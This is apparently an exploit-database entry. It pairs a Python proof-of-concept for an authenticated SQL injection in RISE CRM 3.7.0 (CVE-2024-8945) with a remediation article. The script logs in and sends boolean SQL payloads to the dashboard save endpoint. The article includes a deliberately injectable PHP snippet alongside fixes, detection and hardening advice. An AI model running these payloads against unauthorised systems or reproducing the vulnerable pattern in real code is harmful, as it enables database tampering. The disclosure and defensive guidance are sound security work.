CodeCanyon RISE CRM 3.7.0 - SQL Injection
# Exploit Title: CodeCanyon RISE CRM 3.7.0 - SQL Injection
# Google Dork: N/A
# Date: September 19, 2024
# Exploit Author: Jobyer Ahmed
# Author Homepage: https://bytium.com
# Vulnerable Version: 3.7
# Patched Version: 3.7.1
# Tested on: Ubuntu 24.04, Debian Testing
##########################################
# CVE: CVE-2024-8945
############Instruction#######################
# 1. Login to Ultimate Project Manager 3.7
# 2. Add a New Dashboard
# 3. Launch the PoC Script
#
# Usage: python3 script.py <base_url> <email> <password>
###########################################
import requests
import sys
from termcolor import colored
def login_and_capture_session(base_url, email, password):
login_url = f"{base_url}/index.php/signin/authenticate"
login_data = {"email": email, "password": password, "redirect": ""}
login_headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded"}
session = requests.Session()
response = session.post(login_url, data=login_data, headers=login_headers, verify=False)
if response.status_code == 200 and "dashboard" in response.url:
print(colored("[*] Logged in successfully.", "green"))
return session
else:
print(colored("[!] Login failed.", "red"))
return None
def send_payload(session, target_url, payload):
data = {
"id": payload,
"data": "false",
"title": "PoC Test",
"color": "#ff0000"
}
response = session.post(target_url, headers=session.headers, data=data, verify=False)
return response
def verify_vulnerability(session, target_url):
failed_payload = "-1 OR 1=2-- -"
failed_response = send_payload(session, target_url, failed_payload)
print(colored(f"\nFailed SQL Injection (False Condition) payload: {failed_payload}", "yellow"))
print(colored(f"{failed_response.text[:200]}", "cyan"))
successful_payload = "-1 OR 1=1-- -"
successful_response = send_payload(session, target_url, successful_payload)
if successful_response.status_code == 200 and "The record has been saved." in successful_response.text:
print(colored(f"[*] Vulnerability confirmed via SQL injection! Payload used: {successful_payload}", "green"))
print(colored(f"[*] Successful SQL Injection Response:\n{successful_response.text[:200]}", "cyan"))
print(colored("\nStatus: Vulnerable! Upgrade to patched version!", "red"))
else:
print(colored("\nNot vulnerable!","red"))
if __name__ == "__main__":
if len(sys.argv) != 4:
print("Usage: python3 script.py <base_url> <email> <password>")
sys.exit(1)
base_url, email, password = sys.argv[1], sys.argv[2], sys.argv[3]
session = login_and_capture_session(base_url, email, password)
if not session:
sys.exit(1)
session.headers.update({"User-Agent": "Mozilla/5.0", "Accept": "application/json", "X-Requested-With": "XMLHttpRequest"})
target_url = f"{base_url}/index.php/dashboard/save"
verify_vulnerability(session, target_url)CodeCanyon RISE CRM 3.7.0 — SQL Injection (CVE-2024-8945)
This article explains the SQL injection vulnerability tracked as CVE-2024-8945 that affected RISE CRM (version 3.7.0), the likely root cause, real-world impact, detection and remediation steps, and safe code fixes. The vulnerable product was patched in version 3.7.1 — upgrading is the primary remediation.
Summary of the issue
An authenticated SQL injection was reported in the dashboard save functionality of RISE CRM 3.7.0. The application accepted user-supplied dashboard identifiers and other fields and used them in database operations without proper parameterization and validation. This allowed crafted input to alter SQL control flow in an authenticated request, potentially modifying or accessing unintended data.
Why this is dangerous
- Authenticated SQL injection can allow data exfiltration, unauthorized data modification, privilege escalation, and — depending on the database and environment — remote code execution.
- Because the issue is triggered by normal application functionality (dashboard creation/save), it can be exercised without special privileges beyond a legitimate account.
- Exploitability depends on the database user rights and the application context, but any injection vulnerability in a CRM handling sensitive business data should be considered high-risk.
Root cause (technical)
The typical root cause is concatenation of untrusted input into SQL statements or queries without parameterized queries, or insufficient server-side validation/whitelisting of parameters that are expected to be numeric or constrained values.
Vulnerable pattern (illustrative)
// Vulnerable PHP pattern (illustrative only)
$id = $_POST['id']; // user-controlled
$title= $_POST['title'];
$color= $_POST['color'];
$sql = "UPDATE dashboards SET title = '$title', color = '$color' WHERE id = $id";
$db->query($sql);
Explanation: This example concatenates raw POST parameters into an SQL statement. When input is interpolated directly, an attacker who can control those parameters may change the SQL logic. The snippet above is illustrative — the real product may have different code paths — but the pattern (string concatenation of input into SQL) is the core problem.
Safe fix — use prepared statements and input validation
// Recommended PHP PDO example using prepared statements
// Validate and normalize inputs first
$id = isset($_POST['id']) ? intval($_POST['id']) : 0;
$title = isset($_POST['title']) ? trim($_POST['title']) : '';
$color = isset($_POST['color']) ? trim($_POST['color']) : '';
// Optional: whitelist/validate color (hex color example)
if (!preg_match('/^#[0-9A-Fa-f]{6}$/', $color)) {
$color = '#ffffff';
}
$stmt = $pdo->prepare('UPDATE dashboards SET title = :title, color = :color WHERE id = :id');
$stmt->execute([':title' => $title, ':color' => $color, ':id' => $id]);
Explanation: This example shows three defenses combined:
- Input normalization/validation: casting id to an integer and validating color with a regex reduces the attack surface.
- Prepared statements with bound parameters prevent SQL injection because the database treats bound values as data, not executable SQL.
- Fail-safe defaults help avoid unexpected behavior if validation fails.
Additional secure coding and deployment recommendations
- Always use parameterized queries (PDO prepared statements, mysqli with bind_param, or equivalent ORM methods) rather than building SQL by string concatenation.
- Whitelist expected input values (e.g., numeric ID, limited set of strings, color hex format), and reject or normalize anything else.
- Make the database account used by the application least-privileged: avoid granting administrative permissions unless strictly required.
- Keep error messages generic in production and log details server-side — do not return raw SQL errors to clients.
- Use CSRF protections and check authorization on endpoints that modify data.
- Deploy a Web Application Firewall (WAF) with rules to detect anomalous SQL meta-characters in unexpected fields — use it as a compensating control, not as the only defense.
Detecting exploitation or attempted exploitation
Look for indicators of suspicious activity related to dashboard creation/update endpoints and database logs:
- Unexpected dashboard records or titles that contain non-alphanumeric sequences or SQL control characters.
- Unexpected POST requests to dashboard save endpoints at odd times or in bulk from the same account/IP.
- Database errors containing SQL fragments in web server error logs (these often indicate attempted injection).
- Unusual, high-privilege queries performed by the application account after the relevant timeframe (could indicate escalation).
Forensic queries and monitoring (safe examples)
-- Example safe query to list recently created/updated dashboards
SELECT id, title, updated_at, updated_by
FROM dashboards
WHERE updated_at >= (NOW() - INTERVAL '7 days')
ORDER BY updated_at DESC;
Explanation: The query looks for recent changes to dashboards so you can manually review whether any items look suspicious. Use your normal incident response processes to investigate further.
Patch and mitigation timeline
- Affected: RISE CRM 3.7.0 (as reported).
- Patched: Upgrade to version 3.7.1 (apply vendor-supplied patch immediately).
- Immediate mitigations: upgrade to patched release; if you cannot upgrade immediately, apply strict input validation and limit access to the vulnerable endpoint (network controls, WAF), and rotate database credentials after investigation.
Safe testing and responsible disclosure
If you are a system owner, test the patch in a staging environment before production rollout. Do not attempt to exploit systems you do not own or have explicit authorization to test. If you discover evidence of active exploitation, follow your incident response plan and contact the vendor or CERT as appropriate.
Hardening checklist (practical action items)
- Upgrade RISE CRM to 3.7.1 or later.
- Review all code paths that accept user input and access the database — convert to parameterized queries if any remain using string concatenation.
- Implement server-side validation/whitelisting for expected parameter types.
- Enforce least-privilege on database accounts and rotate credentials if compromise is suspected.
- Enable logging and alerting around the dashboard save endpoint and related database activity.
- Apply a WAF rule set as temporary mitigation and tune to minimize false positives.
Final notes for developers and administrators
SQL injection remains one of the most common and damaging web vulnerabilities. The pattern that led to CVE-2024-8945 — trusting user input and interpolating it into SQL — is preventable with consistent use of parameterized queries, normalization and whitelisting, and defense-in-depth measures (WAF, logging, least privilege). Patch promptly and perform a targeted review of similar code paths in your application to prevent recurrence.